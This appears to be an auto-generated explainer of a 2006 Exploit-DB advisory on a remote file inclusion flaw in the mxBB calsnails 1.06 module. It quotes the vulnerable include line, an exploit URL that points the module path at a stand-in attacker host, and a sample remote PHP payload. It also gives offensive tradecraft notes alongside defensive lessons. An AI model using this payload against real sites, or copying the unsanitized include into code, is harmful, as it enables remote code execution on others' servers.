By exploitdb papers bot•November 17, 2006•
papers
mxBB Module calsnails 1.06 - mx_common.php File Inclusion Explained
mxBB Module calsnails 1.06 - mx_common.php File Inclusion Explained
What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in the "calsnails" module version 1.06 for mxBB. The vulnerability allows an attacker to include and execute arbitrary PHP code hosted on a remote server by manipulating the module_root_path parameter.
Simple technical breakdown
The core of the vulnerability lies in how the mx_common.php file handles the module_root_path variable. It uses this variable to construct a path to a configuration file (cal_settings.php). However, because the input for module_root_path is not properly sanitized, an attacker can provide a URL pointing to a remote PHP file. When the server attempts to include this remote file, it effectively executes the attacker's code.
Complete code and payload walkthrough
The exploit paper itself is very concise and doesn't contain extensive code. However, it points to the vulnerable line and provides an example exploit URL.
Vulnerable Code Snippet:
include_once($module_root_path . 'includes/cal_settings.'.$phpEx);$module_root_path: This variable is intended to hold the root path of the module. In the context of the exploit, this is the user-controlled input.'includes/cal_settings.': This is a static string that forms part of the path to a configuration file.$phpEx: This is a PHP variable that typically holds the file extension for PHP files (e.g.,.php).include_once(): This PHP function includes and evaluates the specified file. If the file has already been included, it will not be included again.
Exploit URL Example:
http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?http://[site]/[path]/includes/mx_common.php: This is the target URL, pointing to the vulnerable script within the mxBB installation.?module_root_path=http://Y0urSh3LL?: This is the crucial part.module_root_path=: This parameter is passed tomx_common.php.http://Y0urSh3LL?: This is the attacker-controlled value. When this is concatenated with'includes/cal_settings.'.$phpEx, the resulting string becomeshttp://Y0urSh3LL?includes/cal_settings.php.- The
include_once()function will then attempt to fetch and executehttp://Y0urSh3LL?includes/cal_settings.php. IfY0urSh3LLis a server controlled by the attacker and hosts a PHP file namedincludes/cal_settings.php(or any file that the attacker wants to execute), that code will be executed on the target server. The trailing?inY0urSh3LL?is likely to prevent issues ifY0urSh3LLis a domain name without a trailing slash, ensuring the path is correctly interpreted.
Payload Segment Explanation:
The paper doesn't provide explicit shellcode bytes. The "payload" in this context is the remote PHP file that the attacker hosts. This remote file would contain the malicious PHP code intended to be executed on the target server. For example, a simple remote payload could be:
<?php
// This is the content of the remote file hosted by the attacker
// For example, it could be named 'shell.php' and hosted at http://Y0urSh3LL/shell.php
echo "<h1>Hacked!</h1>";
phpinfo(); // Or any other command to execute
?>When the vulnerable server includes this, the echo and phpinfo() functions would execute on the target server.
Code Fragment/Block -> Practical Purpose Mapping:
include_once($module_root_path . 'includes/cal_settings.'.$phpEx);-> Vulnerable Inclusion Logic: This line attempts to include a configuration file. By controlling$module_root_path, an attacker can force it to include a remote file instead of a local one, leading to Remote File Inclusion.module_root_path=http://Y0urSh3LL?-> RFI Trigger: This URL parameter injection is the mechanism to supply the attacker's controlled remote file path.
Practical details for offensive operations teams
- Required Access Level: Low. This is a web application vulnerability, exploitable via HTTP requests. No prior authentication or local access is typically required.
- Lab Preconditions:
- A target mxBB installation (version 1.06 or vulnerable to this specific module).
- The "calsnails" module installed and enabled.
- The target server must have PHP configured to allow remote file inclusion (
allow_url_fopen = Oninphp.ini). This is a common but not universal configuration. - An attacker-controlled web server capable of hosting a malicious PHP file.
- Tooling Assumptions:
- A web browser for manual testing or reconnaissance.
- A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify HTTP requests.
- A simple HTTP server (e.g., Python's
http.server,netcat) to host the attacker's payload. - A script (e.g., Python with
requestslibrary) for automated exploitation.
- Execution Pitfalls:
allow_url_fopendisabled: Ifallow_url_fopenisOffin the target server'sphp.ini, RFI will not work. The server will not be able to fetch remote URLs.- Incorrect
phpEx: If the$phpExvariable is not set to.phpor is manipulated, the inclusion might fail or point to an incorrect file. However, in most default PHP configurations,$phpExis'.php'. - Firewall/Network Restrictions: The target server might have outbound firewall rules preventing it from connecting to the attacker's hosting server.
- URL Encoding: Special characters in the attacker's URL might need proper URL encoding.
- Payload Hosting: The attacker's server must be accessible from the target server.
- Module Path Mismatch: If the
module_root_pathis expected to be relative, or if the structureincludes/cal_settings.phpis not found at the root of the provided URL, the exploit may fail. The exploit URLhttp://Y0urSh3LL?implies thatY0urSh3LLitself is the base for the inclusion, and the vulnerable script appends the rest.
- Tradecraft Considerations:
- Reconnaissance: Identify the mxBB version and installed modules. Look for the
calsnailsmodule. - Vulnerability Scanning: Automated scanners might detect this if they check for RFI vulnerabilities.
- Payload Staging: Prepare a simple, non-intrusive payload first (e.g., one that just echoes a unique string) to confirm the RFI. Then, deploy more sophisticated payloads.
- Obfuscation: For more advanced engagements, obfuscating the remote payload or the URL might be considered, though for this specific RFI, the primary mechanism is straightforward.
- Post-Exploitation: Once code execution is achieved, the next steps would involve privilege escalation, lateral movement, or data exfiltration, depending on the engagement objectives.
- Reconnaissance: Identify the mxBB version and installed modules. Look for the
Where this was used and when
- Context: This vulnerability was discovered and published in 2006. It targets web applications built with mxBB, a content management system popular around that time. The "calsnails" module was a specific add-on for mxBB.
- Approximate Years: The exploit was published on 2006-11-17. Therefore, its active exploitation period would likely have been from late 2006 onwards, until mxBB and its vulnerable modules were patched or phased out.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially when it's used in file paths or dynamic code execution. Always sanitize and validate such inputs rigorously.
- Secure Configuration: Ensure
allow_url_fopenis disabled inphp.iniunless absolutely necessary for legitimate functionality, and even then, implement strict controls. - Dependency Management: Keep all web application components, including modules and plugins, up-to-date. Regularly audit installed modules for known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns in HTTP requests.
- Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.
- Code Review: Regularly review custom and third-party code for insecure practices like dynamic file inclusion with untrusted input.
ASCII visual (if applicable)
This vulnerability is a direct interaction between the web server and an external resource.
+-----------------+ +---------------------+ +-------------------+
| Attacker's | | Target Web Server | | Target Application|
| Server |----->| (Vulnerable) |----->| (mxBB calsnails) |
| (Hosts Payload) | | | | |
+-----------------+ +---------------------+ +-------------------+
^ |
| | HTTP Request (GET)
| | with malicious
| | module_root_path
| v
| +-----------------------------------+
| | mx_common.php |
| | include_once($module_root_path . |
| | 'includes/cal_settings.'.$phpEx); |
| +-----------------------------------+
| |
| | HTTP Request (GET)
| | to Attacker's Server
| | to fetch remote file
| v
+------------------------+Source references
- Paper ID: 2799
- Paper Title: mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion
- Author: bd0rk
- Published: 2006-11-17
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2799
- Raw URL: https://www.exploit-db.com/raw/2799
Original Exploit-DB Content (Verbatim)
##################################################################
# #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
# #
# Bugfounder: bd0rk || SOH-Crew #
# #
# Website: www.soh-crew.it.tt #
# #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke #
# #
##################################################################
Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21
Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);
[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?
# milw0rm.com [2006-11-17]